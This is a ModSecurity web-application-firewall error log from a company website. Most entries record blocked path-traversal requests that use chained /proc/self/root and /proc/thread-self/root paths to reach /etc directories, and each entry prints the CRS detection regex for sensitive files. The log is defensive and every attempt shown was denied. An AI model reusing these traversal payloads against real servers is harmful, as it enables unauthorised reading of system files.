[uri "/"] [unique_id "abp8zgkwaGbbGflqUZDq-QAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:08.997277 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:34232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp80CmAPhZkrhU8w4lHfgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:12.940814 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:37708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp809Y0UrI5A3LftIx08AAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:16.741215 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:37716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp82EzinOy1jxa1j4fsFAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:20.643870 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:37726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp83OyqAr6etmhZHNqV9gAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:26.675137 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:38854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp84tY0UrI5A3LftIx1JAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:40.626213 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.228.61:40746] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp88Na6ubjKNq_cu4Zw2wAAA0A"]
[Wed Mar 18 07:22:42.157839 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:38860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp88EzinOy1jxa1j4fsLAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:44.451079 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:54072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp89OoXxyEfFpUF8f9HigAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:22:49.954859 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:44980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8-OyqAr6etmhZHNqWOQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:22:49.973706 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.244.43:43658] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp8-da6ubjKNq_cu4Zw4wAAA1c"]
[Wed Mar 18 07:23:04.865819 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:54078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9CCmAPhZkrhU8w4lHrAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:23:40.435462 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:51968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9LOoXxyEfFpUF8f9H-wAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:23:57.267237 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.241.31:59988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9Pew_le52K8_3pV25xAAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:23:57.512636 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:55864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9PUzinOy1jxa1j4fsiAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:24:16.761612 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:52516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9UOyqAr6etmhZHNqWqQAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:24:18.055325 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:37728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9UuoXxyEfFpUF8f9IGgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:24:20.467278 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:60844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9VNa6ubjKNq_cu4ZxTQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:24:35.895538 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:60858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9Y-w_le52K8_3pV255QAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:24:38.433101 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:33590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9ZkzinOy1jxa1j4fstwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:24:58.431167 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:47858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9eta6ubjKNq_cu4ZxiAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:25:01.083399 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:34908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9few_le52K8_3pV258wAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:25:04.913920 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:34910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9gPu8EFLIOrSqIpvfyAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:25:09.565468 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:34924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9hQkwaGbbGflqUZDrlAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:25:11.067781 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:48062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp9h-w_le52K8_3pV259wAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
